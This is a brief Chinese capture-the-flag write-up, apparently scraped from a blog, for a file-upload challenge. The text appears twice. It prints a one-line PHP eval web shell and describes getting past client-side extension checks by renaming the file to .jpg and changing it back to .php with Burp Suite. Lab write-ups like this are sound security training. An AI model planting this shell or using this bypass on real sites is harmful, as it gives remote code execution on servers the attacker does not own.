upload1
进入环境就一个上传,我们先上传一个普通的木马文件看看
木马内容
<?php @eval($_POST["cmd"]); ?>
估计是前端校验我们查看源码
只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可
然后访问木马文件执行指令即可
执行后查看源码便发现flag
微信扫一扫
进入环境就一个上传,我们先上传一个普通的木马文件看看
木马内容
<?php @eval($_POST["cmd"]); ?>
估计是前端校验我们查看源码
只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可
然后访问木马文件执行指令即可
执行后查看源码便发现flag
相关推荐